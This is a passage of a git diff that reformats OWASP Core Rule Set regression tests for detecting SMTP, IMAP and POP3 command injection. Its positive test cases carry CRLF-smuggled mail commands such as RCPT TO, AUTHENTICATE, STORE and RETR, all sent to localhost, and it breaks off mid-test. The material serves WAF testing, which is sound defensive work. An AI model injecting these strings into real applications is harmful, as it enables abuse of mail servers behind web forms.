textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. + version: HTTP/1.0 + output: + no_log_contains: id "932300" + - test_id: 4 desc: "SMTP EHLO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aEHLO%20test.com" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aEHLO%20test.com" + version: HTTP/1.0 + output: + log_contains: id "932300" + - test_id: 5 desc: "SMTP Command EHLO Injection negative test using ehlo typo in text" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 + version: HTTP/1.0 + output: + no_log_contains: id "932300" + - test_id: 6 desc: "SMTP RCPT TO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" + version: HTTP/1.0 + output: + log_contains: id "932300" + - test_id: 7 desc: "SMTP RCPT TO Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E + version: HTTP/1.0 + output: + no_log_contains: id "932300" + - test_id: 8 desc: "SMTP VRFY TO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" + version: HTTP/1.0 + output: + log_contains: id "932300" + - test_id: 9 desc: "SMTP Command Injection Full SMTP dialog negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel - version: HTTP/1.0 - output: - no_log_contains: id "932300" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel + version: HTTP/1.0 + output: + no_log_contains: id "932300" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml index ce81d351b..b31ecc86d 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml @@ -2,124 +2,116 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: SMTP Command Injection test cases PL3" - enabled: true - name: 932301.yaml +rule_id: 932301 tests: - - test_title: 932301-1 + - test_id: 1 desc: "SMTP DATA Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=%0d%0aDATA" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=%0d%0aDATA" + version: HTTP/1.0 + output: + log_contains: id "932301" + - test_id: 2 desc: "SMTP DATA Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=We%20need%20that%20data%20now" - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=We%20need%20that%20data%20now" + version: HTTP/1.0 + output: + no_log_contains: id "932301" + - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20World.%0adata%20not%20found. - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20World.%0adata%20not%20found. + version: HTTP/1.0 + output: + no_log_contains: id "932301" + - test_id: 4 desc: "SMTP QUIT Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aQUIT" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aQUIT" + version: HTTP/1.0 + output: + log_contains: id "932301" + - test_id: 5 desc: "SMTP Command QUIT Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hey%20please%20do%20not%20quit - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hey%20please%20do%20not%20quit + version: HTTP/1.0 + output: + no_log_contains: id "932301" + - test_id: 6 desc: "SMTP HELP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aHELP%20Postmaster" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aHELP%20Postmaster" + version: HTTP/1.0 + output: + log_contains: id "932301" + - test_id: 7 desc: "SMTP HELP Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20needs%20help%20now - version: HTTP/1.0 - output: - no_log_contains: id "932301" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20needs%20help%20now + version: HTTP/1.0 + output: + no_log_contains: id "932301" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml index 347114052..e9e010ae2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml @@ -2,144 +2,135 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: IMAP Command Injection test cases" - enabled: true - name: 932310.yaml +rule_id: 932310 tests: - - test_title: 932310-1 + - test_id: 1 desc: "IMAP APPEND Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F + version: HTTP/1.0 + output: + log_contains: id "932310" + - test_id: 2 desc: "IMAP APPEND Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" + version: HTTP/1.0 + output: + no_log_contains: id "932310" + - test_id: 3 desc: "IMAP AUTHENTICATE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A + version: HTTP/1.0 + output: + log_contains: id "932310" + - test_id: 4 desc: "IMAP AUTHENTICATE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Cannot%20authenticate%20anyways" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Cannot%20authenticate%20anyways" + version: HTTP/1.0 + output: + no_log_contains: id "932310" + - test_id: 5 desc: "IMAP STATUS Command injection positive test" # STATUS [a-zA-Z0-9\"\./%\*&]+? (?:\((UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\))? stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) + version: HTTP/1.0 + output: + log_contains: id "932310" + - test_id: 6 desc: "IMAP STATUS Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" + version: HTTP/1.0 + output: + no_log_contains: id "932310" + - test_id: 7 desc: "IMAP UID Command injection positive test" # UID (COPY|FETCH|STORE) [0-9,:\*]+? stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A + version: HTTP/1.0 + output: + log_contains: id "932310" + - test_id: 8 desc: "IMAP UID Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=The%20uid%20is%020not%020working" - version: HTTP/1.0 - output: - no_log_contains: id "932310" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=The%20uid%20is%020not%020working" + version: HTTP/1.0 + output: + no_log_contains: id "932310" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml index e8b31cdb2..841205b7e 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml @@ -2,237 +2,223 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: IMAP Command Injection test cases PL3" - enabled: true - name: 932311.yaml +rule_id: 932311 tests: - - test_title: 932311-1 + - test_id: 1 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 2 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - X-injection-header: "CREATE:1" - method: GET - port: 80 - uri: "/get?text=We%examine%20this%20mail%20from%20Mars" - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + X-injection-header: "CREATE:1" + method: GET + port: 80 + uri: "/get?text=We%examine%20this%20mail%20from%20Mars" + version: HTTP/1.0 + output: + no_log_contains: id "932311" + - test_id: 3 desc: "IMAP COPY Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aa002%20copy%202%3A4%20MEETING - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aa002%20copy%202%3A4%20MEETING + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 4 desc: "IMAP COPY Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents + version: HTTP/1.0 + output: + no_log_contains: id "932311" + - test_id: 5 desc: "IMAP LIST Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 6 desc: "IMAP LIST Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=We%20need%20the%20list%20%22ASAP%22 - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=We%20need%20the%20list%20%22ASAP%22 + version: HTTP/1.0 + output: + no_log_contains: id "932311" + - test_id: 7 desc: "IMAP STORE Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 8 desc: "IMAP STORE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 + version: HTTP/1.0 + output: + no_log_contains: id "932311" + - test_id: 9 desc: "IMAP SEARCH Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 10 desc: "IMAP SEARCH with CHARSET Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 11 desc: "IMAP SEARCH using TEXT Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 12 desc: "IMAP SEARCH using CHARSET and range Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 13 desc: "IMAP SEARCH Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. - version: HTTP/1.0 - output: - no_log_contains: id "932311" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. + version: HTTP/1.0 + output: + no_log_contains: id "932311" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml index 34be803b8..ac2fcaab7 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml @@ -2,192 +2,180 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: POP3 Command Injection test cases" - enabled: true - name: 932320.yaml +rule_id: 932320 tests: - - test_title: 932320-1 + - test_id: 1 desc: "POP3 RETR/DELE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRETR%20123" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 